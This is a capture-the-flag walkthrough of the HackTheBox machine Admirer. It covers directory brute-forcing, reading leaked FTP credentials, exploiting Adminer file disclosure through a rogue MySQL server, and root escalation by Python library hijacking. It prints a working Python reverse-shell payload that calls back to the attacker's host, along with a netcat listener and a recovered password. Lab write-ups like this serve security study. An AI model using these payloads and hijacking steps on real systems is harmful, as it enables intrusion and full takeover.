Today we are going to crack a machine called Admirer. It was created by #########. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Browsing HTTP Service
o
Directory Bruteforce using
gobuster
o
Enumerating FTP Service
o
Enumerating Backup Files
o
Directory Bruteforce using
gobuster
o
Detecting Vulnerable Adminer
·
Exploitation
o
Configuring MySQL
o
Creating user and Database in
MySQL
o
Connecting the local MySQL with
adminer
o
Running Query for Arbitrary
File Disclosure
o
Reading User Flag
·
Privilege Escalation
o
Escalating Privilege using
Python Library Hijacking
·
Reading Root Flag
Walkthrough
Network Scanning
To Attack any machine, we need the IP
Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.77.71
Now that we have the IP Address. We need to
enumerate open ports on the machine. For this, we will be running a nmap scan.
To get in-depth details of the machine. We ran a Nmap Version Scan.
nmap -sC -sV 10.129.77.71
The Nmap Version scan quickly gave us some great
information. It positively informed that the following ports and services are
running: 21 (FTP), 22 (SSH), 80 (HTTP). The scan also reveals that there is a
robots.txt file present on the server. It contains a disallowed entry (/admin-dir)
in it.
Enumeration
We started our Enumeration with the HTTP
Service. We ran the browser and opened the IP Address of the machine. It gave
us a webpage with some images. Clicking on the images enlarges them with some
text written on them. It contains a Contact US form as well. But it is mostly aesthetic.
Nothing seems to be functional.
http://10.129.77.71
We went back to the Nmap Scan performed
earlier. We tried to access the /admin-dir directory that was extracted from
the robots.txt file on the target server.
http://10.129.77.71/admin-dir/
At this moment usually, we perform a
Directory Bruteforce. We will be suing the go buster for that. We tried
multiple dictionaries but we got some success with the big.txt working with the
.txt extension as shown in the image.
gobuster dir -u
http://10.129.77.71/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x .txt
The gobuster gave us 2 files.
‘contacts.txt’ and ‘credentials.txt’. Let’s check credentials.txt file first.
We saw that there are the credentials for the FTP.
http://10.129.77.71/admin-dir/credentials.txt
We tried logging in using the credentials
provided. We listed the contents on the FTP server and found a dump.sql
database file and html.tar.gz compressed file. We downloaded them to our local
system using the get command. After downloading, firstly we extracted the
html.tar.gz file.
A close inspection of the extracted files
can tell us that it is basically a backup of the website source code. While
traversing in hope for some credentials, we stumbled upon a directory by the
name of ‘utility-scripts/’.
As it is the backup version, it might exist
on the live site as well. To give it a try, we tried accessing the
utility-scripts directory on the server to find a 403 Forbidden Error. This
means that the although inaccessible but it does exist on the server. Let’s
examine these files here on the shell. The phptest.php simple gives output
“Just a test to see if PHP works.” Moving on the info.php page informs about
the PHP version and the location of the site.
Then we have the admin_tasks.php. It just has a bunch of tasks that we
can go through and execute those commands on the system. But as we figured
earlier that all these scripts are forbidden. However, we can’t just give up.
We tried directory Bruteforce with the php extensions in hope for any
particular file that might be accessible on the live server.
gobuster dir -u
http://10.129.77.71/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x
.php
The Gobuster scan was a success. It gave us
the /adminer.php file. As it gave a 200 OK status, it is not forbidden. We
tired opening it and found that it is a MYSQL database management tool. We have
the version written here. Time to get to enumeration.
http://10.129.77.71utility-scripts/adminer.php
There was no need for a deep search, just a
basic google search gave a step-by-step method to exploit the adminer.
Reference: Foregenix
Blog
The vulnerability that adminer suffers from
is generally called Arbitrary File Disclosure. If we have to categorise it
according to OWASP Top 10 (2017), it will fall on the lines of Sensitive Data
Exposure. Basically, Attackers can take advantage of this vulnerability to
fetch passwords for any CMS installed from the database or gain the full access
of the database.
Exploitation
To exploit this vulnerability, we need to
configure a MySQL server on our Kali Linux. Then continue to add table and
columns in it. Here we have already setup a MySQL server. After configuring, we
login in to the MySQl and create a user raaj and continue to provide it all the
Privileges. After that we Flush those actions and then we get ahead to create a
database by the same name as the target machine “adminer”. Then we create a
table by then name of demo with name column in it. After doing all this we exit
from the MySQL.
systemctl start mysql
mysql -u root -p
CREATE USER 'raaj'@'%' IDENTIFIED BY
'password';
GRANT ALL PRIVILEGES ON *.* TO
'raaj'@'%';
FLUSH PRIVILEGES;
create database admirer;
use admirer;
create table demo(name varchar(255));
exit
At this stage if you have a firewall policy
then amend it to allow connections locally. After that we need to configure
MySQL to bind with the local address. This can be done by editing the conf file
in /etc/mysql.
nano
/etc/mysql/mariadb.conf.d/50-server.cnf
Now that all is set, we restart the mysql
and head to the Adminer page. Here we use the credentials we created earlier
with the IP address provided by the HTB VPN. We also provide the password we
created and the database name we are trying to access.
After logging in, it’s time to get the data
form the target machine’s database to our newly created database. To do that,
we need to execute the “load data local infile” query. Since due to the
availability of the current user on the target machine i.e., www-data. We can
access the live site data that we previously discovered from php.info file.
load data local infile '../index.php'
into table demo
fields terminated by "/n"
The execution of the query gets us the set
of credentials for waldo user as shown in the image below:
Username: waldo
Password: &<h5b~yK3F#{PaPB&dA}{H>
Using this set of newly found credentials
for the user waldo, we tried to ssh into the target machine.
Privilege Escalation
After login, we start enumerating for
privilege escalation. We ran the sudo -l command to list binaries or scripts
with sudo permission that we can exploit to elevate privilege to root. We see
that we have the setenv binary. It is used to set the environment variables and
we see that we it is set on the admin_tasks.sh script. Now, to proceed further,
we need to take a look at this admin_task.sh scripts. After listing the
contents of the /opt/scripts/ directory, we found that there is a backup.py
script as well.
We took a look into the backup.py file to
see that it is importing make_archive from the shutil library and take the
contents of the /var/www/html/ to /var/backups/html. With the combination of
the sudo permission setenv binary and the usage of shutil library, we can
elevate privileges here. To do this we will need to create a version of shutil
library with a reverse shell python script which will indeed get executed via
admin_tasks.sh to give us back a root shell. Also, we can read the user flag at
this moment.
cat backup.py
cat /home/waldo/user.txt
mkdir /tmp/raj
nano /tmp/raj/shutil.py
Now that we have created a shutil.py in the
tmp directory, we need to inject it with the reverse shell code as shown in the
image below.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.52",4444));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;
pty.spawn("/bin/bash")
Next, we use the sudo to change add the
/tmp/ directory as the environment variable that will allow python to use our
shutil.py file. After running the admin_tasks.sh, we need to trigger the
backup.py which can call to shutil.py. Before doing this ensure that a listener
is running with the port mentioned on the payload so that when the session is
created, it can be accessed.
sudo PYTHONPATH=/tmp/raj
/opt/scripts/admin_tasks.sh
Without taking much time, we have to root
shell on the target machine. After reading the root flag we can conclude this
CTF Challenge.
nc -lvp 4444
cd /root
ls
cat root.txt
0 comments:
Post a Comment